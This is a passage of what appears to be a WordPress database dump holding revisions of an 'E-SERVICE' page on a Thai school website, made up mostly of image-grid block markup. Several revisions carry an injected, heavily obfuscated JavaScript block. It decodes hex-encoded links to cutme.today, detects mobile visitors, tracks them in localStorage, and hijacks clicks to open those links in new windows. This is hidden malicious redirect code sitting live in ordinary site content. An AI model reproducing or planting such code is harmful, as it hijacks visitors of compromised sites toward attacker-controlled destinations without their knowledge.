2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-02 11:07:10','2025-07-02 04:07:10','',459,'http://pakhaeng.ssk.in.th/?p=1619',0,'revision','',0),
(1620,1,'2025-07-02 14:11:02','2025-07-02 07:11:02','','Is It a Gift Instagram Post','','inherit','','closed','','is-it-a-gift-instagram-post-5','','','2025-07-02 14:11:02','2025-07-02 07:11:02','',459,'http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post.png',0,'attachment','image/png',0),
(1621,1,'2025-07-02 14:11:07','2025-07-02 07:11:07','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ห้องประชุม-1.png\" alt=\"\" class=\"wp-image-739\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1614,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=1611\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/5-2.png\" alt=\"\" class=\"wp-image-1614\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<p><script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script></p>\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->','E-SERVICE','','inherit','closed','closed','','459-revision-v1','','','2025-07-02 14:11:07','2025-07-02 07:11:07','',459,'http://pakhaeng.ssk.in.th/?p=1621',0,'revision','',0),
(1622,1,'2025-07-02 14:11:08','2025-07-02 07:11:08','<!-- wp:image {\"id\":1620,\"sizeSlug\":\"large\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-large\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/Is-It-a-Gift-Instagram-Post-1024x256.png\" alt=\"\" class=\"wp-image-1620\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:columns -->\n<div class=\"wp-block-columns\"><!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":736,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=700\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ย้าย-1.png\" alt=\"\" class=\"wp-image-736\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1608,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\",\"className\":\"is-style-default\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized is-style-default\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=563\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/comment.png\" alt=\"\" class=\"wp-image-1608\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":738,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=741\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/ดูเกรด-1.png\" alt=\"\" class=\"wp-image-738\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":1606,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2025/07/6.png\" alt=\"\" class=\"wp-image-1606\" style=\"aspect-ratio:1;object-fit:cover;width:200px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":739,\"width\":\"200px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full 